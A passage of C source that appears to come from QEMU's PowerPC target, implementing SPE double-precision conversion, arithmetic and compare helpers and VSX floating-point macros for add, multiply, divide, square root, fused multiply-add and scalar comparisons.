32), \ e##name(env, op1, op2)); \ } /* evfststlt */ HELPER_VECTOR_SPE_CMP(fststlt); /* evfststgt */ HELPER_VECTOR_SPE_CMP(fststgt); /* evfststeq */ HELPER_VECTOR_SPE_CMP(fststeq); /* evfscmplt */ HELPER_VECTOR_SPE_CMP(fscmplt); /* evfscmpgt */ HELPER_VECTOR_SPE_CMP(fscmpgt); /* evfscmpeq */ HELPER_VECTOR_SPE_CMP(fscmpeq); /* Double-precision floating-point conversion */ uint64_t helper_efdcfsi(CPUPPCState *env, uint32_t val) { CPU_DoubleU u; u.d = int32_to_float64(val, &env->vec_status); return u.ll; } uint64_t helper_efdcfsid(CPUPPCState *env, uint64_t val) { CPU_DoubleU u; u.d = int64_to_float64(val, &env->vec_status); return u.ll; } uint64_t helper_efdcfui(CPUPPCState *env, uint32_t val) { CPU_DoubleU u; u.d = uint32_to_float64(val, &env->vec_status); return u.ll; } uint64_t helper_efdcfuid(CPUPPCState *env, uint64_t val) { CPU_DoubleU u; u.d = uint64_to_float64(val, &env->vec_status); return u.ll; } uint32_t helper_efdctsi(CPUPPCState *env, uint64_t val) { CPU_DoubleU u; u.ll = val; /* NaN are not treated the same way IEEE 754 does */ if (unlikely(float64_is_any_nan(u.d))) { return 0; } return float64_to_int32(u.d, &env->vec_status); } uint32_t helper_efdctui(CPUPPCState *env, uint64_t val) { CPU_DoubleU u; u.ll = val; /* NaN are not treated the same way IEEE 754 does */ if (unlikely(float64_is_any_nan(u.d))) { return 0; } return float64_to_uint32(u.d, &env->vec_status); } uint32_t helper_efdctsiz(CPUPPCState *env, uint64_t val) { CPU_DoubleU u; u.ll = val; /* NaN are not treated the same way IEEE 754 does */ if (unlikely(float64_is_any_nan(u.d))) { return 0; } return float64_to_int32_round_to_zero(u.d, &env->vec_status); } uint64_t helper_efdctsidz(CPUPPCState *env, uint64_t val) { CPU_DoubleU u; u.ll = val; /* NaN are not treated the same way IEEE 754 does */ if (unlikely(float64_is_any_nan(u.d))) { return 0; } 
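/*
 * As in the other SPE conversions above, a NaN input has already been
 * mapped to 0 here rather than to the IEEE invalid-operation result;
 * everything else falls through to the softfloat round-toward-zero
 * conversion, which truncates toward zero (e.g. -1.5 -> -1) and
 * saturates out-of-range inputs (e.g. 2^63 -> INT64_MAX).
 */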
return float64_to_int64_round_to_zero(u.d, &env->vec_status); } uint32_t helper_efdctuiz(CPUPPCState *env, uint64_t val) { CPU_DoubleU u; u.ll = val; /* NaN are not treated the same way IEEE 754 does */ if (unlikely(float64_is_any_nan(u.d))) { return 0; } return float64_to_uint32_round_to_zero(u.d, &env->vec_status); } uint64_t helper_efdctuidz(CPUPPCState *env, uint64_t val) { CPU_DoubleU u; u.ll = val; /* NaN are not treated the same way IEEE 754 does */ if (unlikely(float64_is_any_nan(u.d))) { return 0; } return float64_to_uint64_round_to_zero(u.d, &env->vec_status); } uint64_t helper_efdcfsf(CPUPPCState *env, uint32_t val) { CPU_DoubleU u; float64 tmp; u.d = int32_to_float64(val, &env->vec_status); tmp = int64_to_float64(1ULL << 32, &env->vec_status); u.d = float64_div(u.d, tmp, &env->vec_status); return u.ll; } uint64_t helper_efdcfuf(CPUPPCState *env, uint32_t val) { CPU_DoubleU u; float64 tmp; u.d = uint32_to_float64(val, &env->vec_status); tmp = int64_to_float64(1ULL << 32, &env->vec_status); u.d = float64_div(u.d, tmp, &env->vec_status); return u.ll; } uint32_t helper_efdctsf(CPUPPCState *env, uint64_t val) { CPU_DoubleU u; float64 tmp; u.ll = val; /* NaN are not treated the same way IEEE 754 does */ if (unlikely(float64_is_any_nan(u.d))) { return 0; } tmp = uint64_to_float64(1ULL << 32, &env->vec_status); u.d = float64_mul(u.d, tmp, &env->vec_status); return float64_to_int32(u.d, &env->vec_status); } uint32_t helper_efdctuf(CPUPPCState *env, uint64_t val) { CPU_DoubleU u; float64 tmp; u.ll = val; /* NaN are not treated the same way IEEE 754 does */ if (unlikely(float64_is_any_nan(u.d))) { return 0; } tmp = uint64_to_float64(1ULL << 32, &env->vec_status); u.d = float64_mul(u.d, tmp, &env->vec_status); return float64_to_uint32(u.d, &env->vec_status); } uint32_t helper_efscfd(CPUPPCState *env, uint64_t val) { CPU_DoubleU u1; CPU_FloatU u2; u1.ll = val; u2.f = float64_to_float32(u1.d, &env->vec_status); return u2.l; } uint64_t helper_efdcfs(CPUPPCState *env, uint32_t val) { CPU_DoubleU u2; CPU_FloatU u1; u1.l = val; u2.d = float32_to_float64(u1.f, &env->vec_status); return u2.ll; } /* Double-precision floating-point arithmetic */ uint64_t helper_efdadd(CPUPPCState *env, uint64_t op1, uint64_t op2) { CPU_DoubleU u1, u2; u1.ll = op1; u2.ll = op2; u1.d = float64_add(u1.d, u2.d, &env->vec_status); return u1.ll; } uint64_t helper_efdsub(CPUPPCState *env, uint64_t op1, uint64_t op2) { CPU_DoubleU u1, u2; u1.ll = op1; u2.ll = op2; u1.d = float64_sub(u1.d, u2.d, &env->vec_status); return u1.ll; } uint64_t helper_efdmul(CPUPPCState *env, uint64_t op1, uint64_t op2) { CPU_DoubleU u1, u2; u1.ll = op1; u2.ll = op2; u1.d = float64_mul(u1.d, u2.d, &env->vec_status); return u1.ll; } uint64_t helper_efddiv(CPUPPCState *env, uint64_t op1, uint64_t op2) { CPU_DoubleU u1, u2; u1.ll = op1; u2.ll = op2; u1.d = float64_div(u1.d, u2.d, &env->vec_status); return u1.ll; } /* Double-precision floating-point helpers */ uint32_t helper_efdtstlt(CPUPPCState *env, uint64_t op1, uint64_t op2) { CPU_DoubleU u1, u2; u1.ll = op1; u2.ll = op2; return float64_lt(u1.d, u2.d, &env->vec_status) ? 4 : 0; } uint32_t helper_efdtstgt(CPUPPCState *env, uint64_t op1, uint64_t op2) { CPU_DoubleU u1, u2; u1.ll = op1; u2.ll = op2; return float64_le(u1.d, u2.d, &env->vec_status) ? 0 : 4; } uint32_t helper_efdtsteq(CPUPPCState *env, uint64_t op1, uint64_t op2) { CPU_DoubleU u1, u2; u1.ll = op1; u2.ll = op2; return float64_eq_quiet(u1.d, u2.d, &env->vec_status) ?
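/* (eq_quiet: quiet NaNs compare unequal here without raising the
 * invalid flag, which fits the exception-free tst* semantics) */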
4 : 0; } uint32_t helper_efdcmplt(CPUPPCState *env, uint64_t op1, uint64_t op2) { /* XXX: TODO: test special values (NaN, infinities, ...) */ return helper_efdtstlt(env, op1, op2); } uint32_t helper_efdcmpgt(CPUPPCState *env, uint64_t op1, uint64_t op2) { /* XXX: TODO: test special values (NaN, infinities, ...) */ return helper_efdtstgt(env, op1, op2); } uint32_t helper_efdcmpeq(CPUPPCState *env, uint64_t op1, uint64_t op2) { /* XXX: TODO: test special values (NaN, infinities, ...) */ return helper_efdtsteq(env, op1, op2); } #define float64_to_float64(x, env) x /* * VSX_ADD_SUB - VSX floating point add/subtract * name - instruction mnemonic * op - operation (add or sub) * nels - number of elements (1, 2 or 4) * tp - type (float32 or float64) * fld - vsr_t field (VsrD(*) or VsrW(*)) * sfprf - set FPRF * r2sp - round intermediate result to single precision */ #define VSX_ADD_SUB(name, op, nels, tp, fld, sfprf, r2sp) \ void helper_##name(CPUPPCState *env, ppc_vsr_t *xt, \ ppc_vsr_t *xa, ppc_vsr_t *xb) \ { \ ppc_vsr_t t = *xt; \ int i; \ \ helper_reset_fpstatus(env); \ \ for (i = 0; i < nels; i++) { \ float_status tstat = env->fp_status; \ set_float_exception_flags(0, &tstat); \ t.fld = tp##_##op(xa->fld, xb->fld, &tstat); \ env->fp_status.float_exception_flags |= tstat.float_exception_flags; \ \ if (unlikely(tstat.float_exception_flags & float_flag_invalid)) { \ float_invalid_op_addsub(env, sfprf, GETPC(), \ tp##_classify(xa->fld) | \ tp##_classify(xb->fld)); \ } \ \ if (r2sp) { \ t.fld = helper_frsp(env, t.fld); \ } \ \ if (sfprf) { \ helper_compute_fprf_float64(env, t.fld); \ } \ } \ *xt = t; \ do_float_check_status(env, GETPC()); \ } VSX_ADD_SUB(xsadddp, add, 1, float64, VsrD(0), 1, 0) VSX_ADD_SUB(xsaddsp, add, 1, float64, VsrD(0), 1, 1) VSX_ADD_SUB(xvadddp, add, 2, float64, VsrD(i), 0, 0) VSX_ADD_SUB(xvaddsp, add, 4, float32, VsrW(i), 0, 0) VSX_ADD_SUB(xssubdp, sub, 1, float64, VsrD(0), 1, 0) VSX_ADD_SUB(xssubsp, sub, 1, float64, VsrD(0), 1, 1) VSX_ADD_SUB(xvsubdp, sub, 2, float64, VsrD(i), 0, 0) VSX_ADD_SUB(xvsubsp, sub, 4, float32, VsrW(i), 0, 0) void helper_xsaddqp(CPUPPCState *env, uint32_t opcode, ppc_vsr_t *xt, ppc_vsr_t *xa, ppc_vsr_t *xb) { ppc_vsr_t t = *xt; float_status tstat; helper_reset_fpstatus(env); tstat = env->fp_status; if (unlikely(Rc(opcode) != 0)) { tstat.float_rounding_mode = float_round_to_odd; } set_float_exception_flags(0, &tstat); t.f128 = float128_add(xa->f128, xb->f128, &tstat); env->fp_status.float_exception_flags |= tstat.float_exception_flags; if (unlikely(tstat.float_exception_flags & float_flag_invalid)) { float_invalid_op_addsub(env, 1, GETPC(), float128_classify(xa->f128) | float128_classify(xb->f128)); } helper_compute_fprf_float128(env, t.f128); *xt = t; do_float_check_status(env, GETPC()); } /* * VSX_MUL - VSX floating point multiply * op - instruction mnemonic * nels - number of elements (1, 2 or 4) * tp - type (float32 or float64) * fld - vsr_t field (VsrD(*) or VsrW(*)) * sfprf - set FPRF * r2sp - round intermediate result to single precision */ #define VSX_MUL(op, nels, tp, fld, sfprf, r2sp) \ void helper_##op(CPUPPCState *env, ppc_vsr_t *xt, \ ppc_vsr_t *xa, ppc_vsr_t *xb) \ { \ ppc_vsr_t t = *xt; \ int i; \ \ helper_reset_fpstatus(env); \ \ for (i = 0; i < nels; i++) { \ float_status tstat = env->fp_status; \ set_float_exception_flags(0, &tstat); \ t.fld = tp##_mul(xa->fld, xb->fld, &tstat); \ env->fp_status.float_exception_flags |= tstat.float_exception_flags; \ \ if (unlikely(tstat.float_exception_flags & float_flag_invalid)) { \ float_invalid_op_mul(env, sfprf, GETPC(), \ tp##_classify(xa->fld) | \ tp##_classify(xb->fld)); \ } \ \ if (r2sp) { \ t.fld =
helper_frsp(env, t.fld); \ } \ \ if (sfprf) { \ helper_compute_fprf_float64(env, t.fld); \ } \ } \ \ *xt = t; \ do_float_check_status(env, GETPC()); \ } VSX_MUL(xsmuldp, 1, float64, VsrD(0), 1, 0) VSX_MUL(xsmulsp, 1, float64, VsrD(0), 1, 1) VSX_MUL(xvmuldp, 2, float64, VsrD(i), 0, 0) VSX_MUL(xvmulsp, 4, float32, VsrW(i), 0, 0) void helper_xsmulqp(CPUPPCState *env, uint32_t opcode, ppc_vsr_t *xt, ppc_vsr_t *xa, ppc_vsr_t *xb) { ppc_vsr_t t = *xt; float_status tstat; helper_reset_fpstatus(env); tstat = env->fp_status; if (unlikely(Rc(opcode) != 0)) { tstat.float_rounding_mode = float_round_to_odd; } set_float_exception_flags(0, &tstat); t.f128 = float128_mul(xa->f128, xb->f128, &tstat); env->fp_status.float_exception_flags |= tstat.float_exception_flags; if (unlikely(tstat.float_exception_flags & float_flag_invalid)) { float_invalid_op_mul(env, 1, GETPC(), float128_classify(xa->f128) | float128_classify(xb->f128)); } helper_compute_fprf_float128(env, t.f128); *xt = t; do_float_check_status(env, GETPC()); } /* * VSX_DIV - VSX floating point divide * op - instruction mnemonic * nels - number of elements (1, 2 or 4) * tp - type (float32 or float64) * fld - vsr_t field (VsrD(*) or VsrW(*)) * sfprf - set FPRF */ #define VSX_DIV(op, nels, tp, fld, sfprf, r2sp) \ void helper_##op(CPUPPCState *env, ppc_vsr_t *xt, \ ppc_vsr_t *xa, ppc_vsr_t *xb) \ { \ ppc_vsr_t t = *xt; \ int i; \ \ helper_reset_fpstatus(env); \ \ for (i = 0; i < nels; i++) { \ float_status tstat = env->fp_status; \ set_float_exception_flags(0, &tstat); \ t.fld = tp##_div(xa->fld, xb->fld, &tstat); \ env->fp_status.float_exception_flags |= tstat.float_exception_flags; \ \ if (unlikely(tstat.float_exception_flags & float_flag_invalid)) { \ float_invalid_op_div(env, sfprf, GETPC(), \ tp##_classify(xa->fld) | \ tp##_classify(xb->fld)); \ } \ if (unlikely(tstat.float_exception_flags & float_flag_divbyzero)) { \ float_zero_divide_excp(env, GETPC()); \ } \ \ if (r2sp) { \ t.fld = helper_frsp(env, t.fld); \ } \ \ if (sfprf) { \ helper_compute_fprf_float64(env, t.fld); \ } \ } \ \ *xt = t; \ do_float_check_status(env, GETPC()); \ } VSX_DIV(xsdivdp, 1, float64, VsrD(0), 1, 0) VSX_DIV(xsdivsp, 1, float64, VsrD(0), 1, 1) VSX_DIV(xvdivdp, 2, float64, VsrD(i), 0, 0) VSX_DIV(xvdivsp, 4, float32, VsrW(i), 0, 0) void helper_xsdivqp(CPUPPCState *env, uint32_t opcode, ppc_vsr_t *xt, ppc_vsr_t *xa, ppc_vsr_t *xb) { ppc_vsr_t t = *xt; float_status tstat; helper_reset_fpstatus(env); tstat = env->fp_status; if (unlikely(Rc(opcode) != 0)) { tstat.float_rounding_mode = float_round_to_odd; } set_float_exception_flags(0, &tstat); t.f128 = float128_div(xa->f128, xb->f128, &tstat); env->fp_status.float_exception_flags |= tstat.float_exception_flags; if (unlikely(tstat.float_exception_flags & float_flag_invalid)) { float_invalid_op_div(env, 1, GETPC(), float128_classify(xa->f128) | float128_classify(xb->f128)); } if (unlikely(tstat.float_exception_flags & float_flag_divbyzero)) { float_zero_divide_excp(env, GETPC()); } helper_compute_fprf_float128(env, t.f128); *xt = t; do_float_check_status(env, GETPC()); } /* * VSX_RE - VSX floating point reciprocal estimate * op - instruction mnemonic * nels - number of elements (1, 2 or 4) * tp - type (float32 or float64) * fld - vsr_t field (VsrD(*) or VsrW(*)) * sfprf - set FPRF */ #define VSX_RE(op, nels, tp, fld, sfprf, r2sp) \ void helper_##op(CPUPPCState *env, ppc_vsr_t *xt, ppc_vsr_t *xb) \ { \ ppc_vsr_t t = *xt; \ int i; \ \ helper_reset_fpstatus(env); \ \ for (i = 0; i < nels; i++) { \ if 
(unlikely(tp##_is_signaling_nan(xb->fld, &env->fp_status))) { \ float_invalid_op_vxsnan(env, GETPC()); \ } \ t.fld = tp##_div(tp##_one, xb->fld, &env->fp_status); \ \ if (r2sp) { \ t.fld = helper_frsp(env, t.fld); \ } \ \ if (sfprf) { \ helper_compute_fprf_float64(env, t.fld); \ } \ } \ \ *xt = t; \ do_float_check_status(env, GETPC()); \ } VSX_RE(xsredp, 1, float64, VsrD(0), 1, 0) VSX_RE(xsresp, 1, float64, VsrD(0), 1, 1) VSX_RE(xvredp, 2, float64, VsrD(i), 0, 0) VSX_RE(xvresp, 4, float32, VsrW(i), 0, 0) /* * VSX_SQRT - VSX floating point square root * op - instruction mnemonic * nels - number of elements (1, 2 or 4) * tp - type (float32 or float64) * fld - vsr_t field (VsrD(*) or VsrW(*)) * sfprf - set FPRF */ #define VSX_SQRT(op, nels, tp, fld, sfprf, r2sp) \ void helper_##op(CPUPPCState *env, ppc_vsr_t *xt, ppc_vsr_t *xb) \ { \ ppc_vsr_t t = *xt; \ int i; \ \ helper_reset_fpstatus(env); \ \ for (i = 0; i < nels; i++) { \ float_status tstat = env->fp_status; \ set_float_exception_flags(0, &tstat); \ t.fld = tp##_sqrt(xb->fld, &tstat); \ env->fp_status.float_exception_flags |= tstat.float_exception_flags; \ \ if (unlikely(tstat.float_exception_flags & float_flag_invalid)) { \ if (tp##_is_neg(xb->fld) && !tp##_is_zero(xb->fld)) { \ float_invalid_op_vxsqrt(env, sfprf, GETPC()); \ } else if (tp##_is_signaling_nan(xb->fld, &tstat)) { \ float_invalid_op_vxsnan(env, GETPC()); \ } \ } \ \ if (r2sp) { \ t.fld = helper_frsp(env, t.fld); \ } \ \ if (sfprf) { \ helper_compute_fprf_float64(env, t.fld); \ } \ } \ \ *xt = t; \ do_float_check_status(env, GETPC()); \ } VSX_SQRT(xssqrtdp, 1, float64, VsrD(0), 1, 0) VSX_SQRT(xssqrtsp, 1, float64, VsrD(0), 1, 1) VSX_SQRT(xvsqrtdp, 2, float64, VsrD(i), 0, 0) VSX_SQRT(xvsqrtsp, 4, float32, VsrW(i), 0, 0) /* *VSX_RSQRTE - VSX floating point reciprocal square root estimate * op - instruction mnemonic * nels - number of elements (1, 2 or 4) * tp - type (float32 or float64) * fld - vsr_t field (VsrD(*) or VsrW(*)) * sfprf - set FPRF */ #define VSX_RSQRTE(op, nels, tp, fld, sfprf, r2sp) \ void helper_##op(CPUPPCState *env, ppc_vsr_t *xt, ppc_vsr_t *xb) \ { \ ppc_vsr_t t = *xt; \ int i; \ \ helper_reset_fpstatus(env); \ \ for (i = 0; i < nels; i++) { \ float_status tstat = env->fp_status; \ set_float_exception_flags(0, &tstat); \ t.fld = tp##_sqrt(xb->fld, &tstat); \ t.fld = tp##_div(tp##_one, t.fld, &tstat); \ env->fp_status.float_exception_flags |= tstat.float_exception_flags; \ \ if (unlikely(tstat.float_exception_flags & float_flag_invalid)) { \ if (tp##_is_neg(xb->fld) && !tp##_is_zero(xb->fld)) { \ float_invalid_op_vxsqrt(env, sfprf, GETPC()); \ } else if (tp##_is_signaling_nan(xb->fld, &tstat)) { \ float_invalid_op_vxsnan(env, GETPC()); \ } \ } \ \ if (r2sp) { \ t.fld = helper_frsp(env, t.fld); \ } \ \ if (sfprf) { \ helper_compute_fprf_float64(env, t.fld); \ } \ } \ \ *xt = t; \ do_float_check_status(env, GETPC()); \ } VSX_RSQRTE(xsrsqrtedp, 1, float64, VsrD(0), 1, 0) VSX_RSQRTE(xsrsqrtesp, 1, float64, VsrD(0), 1, 1) VSX_RSQRTE(xvrsqrtedp, 2, float64, VsrD(i), 0, 0) VSX_RSQRTE(xvrsqrtesp, 4, float32, VsrW(i), 0, 0) /* * VSX_TDIV - VSX floating point test for divide * op - instruction mnemonic * nels - number of elements (1, 2 or 4) * tp - type (float32 or float64) * fld - vsr_t field (VsrD(*) or VsrW(*)) * emin - minimum unbiased exponent * emax - maximum unbiased exponent * nbits - number of fraction bits */ #define VSX_TDIV(op, nels, tp, fld, emin, emax, nbits) \ void helper_##op(CPUPPCState *env, uint32_t opcode, \ ppc_vsr_t *xa, ppc_vsr_t *xb) \ { \ int 
i; \ int fe_flag = 0; \ int fg_flag = 0; \ \ for (i = 0; i < nels; i++) { \ if (unlikely(tp##_is_infinity(xa->fld) || \ tp##_is_infinity(xb->fld) || \ tp##_is_zero(xb->fld))) { \ fe_flag = 1; \ fg_flag = 1; \ } else { \ int e_a = ppc_##tp##_get_unbiased_exp(xa->fld); \ int e_b = ppc_##tp##_get_unbiased_exp(xb->fld); \ \ if (unlikely(tp##_is_any_nan(xa->fld) || \ tp##_is_any_nan(xb->fld))) { \ fe_flag = 1; \ } else if ((e_b <= emin) || (e_b >= (emax - 2))) { \ fe_flag = 1; \ } else if (!tp##_is_zero(xa->fld) && \ (((e_a - e_b) >= emax) || \ ((e_a - e_b) <= (emin + 1)) || \ (e_a <= (emin + nbits)))) { \ fe_flag = 1; \ } \ \ if (unlikely(tp##_is_zero_or_denormal(xb->fld))) { \ /* \ * XB is not zero because of the above check and so \ * must be denormalized. \ */ \ fg_flag = 1; \ } \ } \ } \ \ env->crf[BF(opcode)] = 0x8 | (fg_flag ? 4 : 0) | (fe_flag ? 2 : 0); \ } VSX_TDIV(xstdivdp, 1, float64, VsrD(0), -1022, 1023, 52) VSX_TDIV(xvtdivdp, 2, float64, VsrD(i), -1022, 1023, 52) VSX_TDIV(xvtdivsp, 4, float32, VsrW(i), -126, 127, 23) /* * VSX_TSQRT - VSX floating point test for square root * op - instruction mnemonic * nels - number of elements (1, 2 or 4) * tp - type (float32 or float64) * fld - vsr_t field (VsrD(*) or VsrW(*)) * emin - minimum unbiased exponent * nbits - number of fraction bits */ #define VSX_TSQRT(op, nels, tp, fld, emin, nbits) \ void helper_##op(CPUPPCState *env, uint32_t opcode, ppc_vsr_t *xb) \ { \ int i; \ int fe_flag = 0; \ int fg_flag = 0; \ \ for (i = 0; i < nels; i++) { \ if (unlikely(tp##_is_infinity(xb->fld) || \ tp##_is_zero(xb->fld))) { \ fe_flag = 1; \ fg_flag = 1; \ } else { \ int e_b = ppc_##tp##_get_unbiased_exp(xb->fld); \ \ if (unlikely(tp##_is_any_nan(xb->fld))) { \ fe_flag = 1; \ } else if (unlikely(tp##_is_zero(xb->fld))) { \ fe_flag = 1; \ } else if (unlikely(tp##_is_neg(xb->fld))) { \ fe_flag = 1; \ } else if (!tp##_is_zero(xb->fld) && \ (e_b <= (emin + nbits))) { \ fe_flag = 1; \ } \ \ if (unlikely(tp##_is_zero_or_denormal(xb->fld))) { \ /* \ * XB is not zero because of the above check and \ * therefore must be denormalized. \ */ \ fg_flag = 1; \ } \ } \ } \ \ env->crf[BF(opcode)] = 0x8 | (fg_flag ? 4 : 0) | (fe_flag ? 2 : 0); \ } VSX_TSQRT(xstsqrtdp, 1, float64, VsrD(0), -1022, 52) VSX_TSQRT(xvtsqrtdp, 2, float64, VsrD(i), -1022, 52) VSX_TSQRT(xvtsqrtsp, 4, float32, VsrW(i), -126, 23) /* * VSX_MADD - VSX floating point multiply/add variations * op - instruction mnemonic * nels - number of elements (1, 2 or 4) * tp - type (float32 or float64) * fld - vsr_t field (VsrD(*) or VsrW(*)) * maddflgs - flags for the float*muladd routine that control the * various forms (madd, msub, nmadd, nmsub) * sfprf - set FPRF * r2sp - round intermediate result to single precision */ #define VSX_MADD(op, nels, tp, fld, maddflgs, sfprf, r2sp) \ void helper_##op(CPUPPCState *env, ppc_vsr_t *xt, \ ppc_vsr_t *xa, ppc_vsr_t *b, ppc_vsr_t *c) \ { \ ppc_vsr_t t = *xt; \ int i; \ \ helper_reset_fpstatus(env); \ \ for (i = 0; i < nels; i++) { \ float_status tstat = env->fp_status; \ set_float_exception_flags(0, &tstat); \ if (r2sp && (tstat.float_rounding_mode == float_round_nearest_even)) {\ /* \ * Avoid double rounding errors by rounding the intermediate \ * result to odd.
\ */ \ set_float_rounding_mode(float_round_to_zero, &tstat); \ t.fld = tp##_muladd(xa->fld, b->fld, c->fld, \ maddflgs, &tstat); \ t.fld |= (get_float_exception_flags(&tstat) & \ float_flag_inexact) != 0; \ } else { \ t.fld = tp##_muladd(xa->fld, b->fld, c->fld, \ maddflgs, &tstat); \ } \ env->fp_status.float_exception_flags |= tstat.float_exception_flags; \ \ if (unlikely(tstat.float_exception_flags & float_flag_invalid)) { \ tp##_maddsub_update_excp(env, xa->fld, b->fld, \ c->fld, maddflgs, GETPC()); \ } \ \ if (r2sp) { \ t.fld = helper_frsp(env, t.fld); \ } \ \ if (sfprf) { \ helper_compute_fprf_float64(env, t.fld); \ } \ } \ *xt = t; \ do_float_check_status(env, GETPC()); \ } VSX_MADD(xsmadddp, 1, float64, VsrD(0), MADD_FLGS, 1, 0) VSX_MADD(xsmsubdp, 1, float64, VsrD(0), MSUB_FLGS, 1, 0) VSX_MADD(xsnmadddp, 1, float64, VsrD(0), NMADD_FLGS, 1, 0) VSX_MADD(xsnmsubdp, 1, float64, VsrD(0), NMSUB_FLGS, 1, 0) VSX_MADD(xsmaddsp, 1, float64, VsrD(0), MADD_FLGS, 1, 1) VSX_MADD(xsmsubsp, 1, float64, VsrD(0), MSUB_FLGS, 1, 1) VSX_MADD(xsnmaddsp, 1, float64, VsrD(0), NMADD_FLGS, 1, 1) VSX_MADD(xsnmsubsp, 1, float64, VsrD(0), NMSUB_FLGS, 1, 1) VSX_MADD(xvmadddp, 2, float64, VsrD(i), MADD_FLGS, 0, 0) VSX_MADD(xvmsubdp, 2, float64, VsrD(i), MSUB_FLGS, 0, 0) VSX_MADD(xvnmadddp, 2, float64, VsrD(i), NMADD_FLGS, 0, 0) VSX_MADD(xvnmsubdp, 2, float64, VsrD(i), NMSUB_FLGS, 0, 0) VSX_MADD(xvmaddsp, 4, float32, VsrW(i), MADD_FLGS, 0, 0) VSX_MADD(xvmsubsp, 4, float32, VsrW(i), MSUB_FLGS, 0, 0) VSX_MADD(xvnmaddsp, 4, float32, VsrW(i), NMADD_FLGS, 0, 0) VSX_MADD(xvnmsubsp, 4, float32, VsrW(i), NMSUB_FLGS, 0, 0) /* * VSX_SCALAR_CMP_DP - VSX scalar floating point compare double precision * op - instruction mnemonic * cmp - comparison operation * exp - expected result of comparison * svxvc - set VXVC bit */ #define VSX_SCALAR_CMP_DP(op, cmp, exp, svxvc) \ void helper_##op(CPUPPCState *env, ppc_vsr_t *xt, \ ppc_vsr_t *xa, ppc_vsr_t *xb) \ { \ ppc_vsr_t t = *xt; \ bool vxsnan_flag = false, vxvc_flag = false, vex_flag = false; \ \ if (float64_is_signaling_nan(xa->VsrD(0), &env->fp_status) || \ float64_is_signaling_nan(xb->VsrD(0), &env->fp_status)) { \ vxsnan_flag = true; \ if (fpscr_ve == 0 && svxvc) { \ vxvc_flag = true; \ } \ } else if (svxvc) { \ vxvc_flag = float64_is_quiet_nan(xa->VsrD(0), &env->fp_status) || \ float64_is_quiet_nan(xb->VsrD(0), &env->fp_status); \ } \ if (vxsnan_flag) { \ float_invalid_op_vxsnan(env, GETPC()); \ } \ if (vxvc_flag) { \ float_invalid_op_vxvc(env, 0, GETPC()); \ } \ vex_flag = fpscr_ve && (vxvc_flag || vxsnan_flag); \ \ if (!vex_flag) { \ if (float64_##cmp(xb->VsrD(0), xa->VsrD(0), \ &env->fp_status) == exp) { \ t.VsrD(0) = -1; \ t.VsrD(1) = 0; \ } else { \ t.VsrD(0) = 0; \ t.VsrD(1) = 0; \ } \ } \ *xt = t; \ do_float_check_status(env, GETPC()); \ } VSX_SCALAR_CMP_DP(xscmpeqdp, eq, 1, 0) VSX_SCALAR_CMP_DP(xscmpgedp, le, 1, 1) VSX_SCALAR_CMP_DP(xscmpgtdp, lt, 1, 1) VSX_SCALAR_CMP_DP(xscmpnedp, eq, 0, 0) void helper_xscmpexpdp(CPUPPCState *env, uint32_t opcode, ppc_vsr_t *xa, ppc_vsr_t *xb) { int64_t exp_a, exp_b; uint32_t cc; exp_a = extract64(xa->VsrD(0), 52, 11); exp_b = extract64(xb->VsrD(0), 52, 11); if (unlikely(float64_is_any_nan(xa->VsrD(0)) || float64_is_any_nan(xb->VsrD(0)))) { cc = CRF_SO; } else { if (exp_a < exp_b) { cc = CRF_LT; } else if (exp_a > exp_b) { cc = CRF_GT; } else { cc = CRF_EQ; } } env->fpscr &= ~FP_FPCC; env->fpscr |= cc << FPSCR_FPCC; env->crf[BF(opcode)] = cc; do_float_check_status(env, GETPC()); } void helper_xscmpexpqp(CPUPPCState *env, uint32_t 
opcode, ppc_vsr_t *xa, ppc_vsr_t *xb) { int64_t exp_a, exp_b; uint32_t cc; exp_a = extract64(xa->VsrD(0), 48, 15); exp_b = extract64(xb->VsrD(0), 48, 15); if (unlikely(float128_is_any_nan(xa->f128) || float128_is_any_nan(xb->f128))) { cc = CRF_SO; } else { if (exp_a < exp_b) { cc = CRF_LT; } else if (exp_a > exp_b) { cc = CRF_GT; } else { cc = CRF_EQ; } } env->fpscr &= ~FP_FPCC; env->fpscr |= cc << FPSCR_FPCC; env->crf[BF(opcode)] = cc; do_float_check_status(env, GETPC()); } #define VSX_SCALAR_CMP(op, ordered) \ void helper_##op(CPUPPCState *env, uint32_t opcode, \ ppc_vsr_t *xa, ppc_vsr_t *xb) \ { \ uint32_t cc = 0; \ bool vxsnan_flag = false, vxvc_flag = false; \ \ helper_reset_fpstatus(env); \ \ if (float64_is_signaling_nan(xa->VsrD(0), &env->fp_status) || \ float64_is_signaling_nan(xb->VsrD(0), &env->fp_status)) { \ vxsnan_flag = true; \ cc = CRF_SO; \ if (fpscr_ve == 0 && ordered) { \ vxvc_flag = true; \ } \ } else if (float64_is_quiet_nan(xa->VsrD(0), &env->fp_status) || \ float64_is_quiet_nan(xb->VsrD(0), &env->fp_status)) { \ cc = CRF_SO; \ if (ordered) { \ vxvc_flag = true; \ } \ } \ if (vxsnan_flag) { \ float_invalid_op_vxsnan(env, GETPC()); \ } \ if (vxvc_flag) { \ float_invalid_op_vxvc(env, 0, GETPC()); \ } \ \ if (float64_lt(xa->VsrD(0), xb->VsrD(0), &env->fp_status)) { \ cc |= CRF_LT; \ } else if (!float64_le(xa->VsrD(0), xb->VsrD(0), &env->fp_status)) { \ cc |= CRF_GT; \ } else { \ cc |= CRF_EQ; \ } \ \ env->fpscr &= ~FP_FPCC; \ env->fpscr |= cc << FPSCR_FPCC; \ env->crf[BF(opcode)] = cc; \ \ do_float_check_status(env, GETPC()); \ } VSX_SCALAR_CMP(xscmpodp, 1) VSX_SCALAR_CMP(xscmpudp, 0) #define VSX_SCALAR_CMPQ(op, ordered) \ void helper_##op(CPUPPCState *env, uint32_t opcode, \ ppc_vsr_t *xa, ppc_vsr_t *xb) \ { \ uint32_t cc = 0; \ bool vxsnan_flag = false, vxvc_flag = false; \ \ helper_reset_fpstatus(env); \ \ if (float128_is_signaling_nan(xa->f128, &env->fp_status) || \ float128_is_signaling_nan(xb->f128, &env->fp_status)) { \ vxsnan_flag = true; \ cc = CRF_SO; \ if (fpscr_ve == 0 && ordered) { \ vxvc_flag = true; \ } \ } else if (float128_is_quiet_nan(xa->f128, &env->fp_status) || \ float128_is_quiet_nan(xb->f128, &env->fp_status)) { \ cc = CRF_SO; \ if (ordered) { \ vxvc_flag = true; \ } \ } \ if (vxsnan_flag) { \ float_invalid_op_vxsnan(env, GETPC()); \ } \ if (vxvc_flag) { \ float_invalid_op_vxvc(env, 0, GETPC()); \ } \ \ if (float128_lt(xa->f128, xb->f128, &env->fp_status)) { \ cc |= 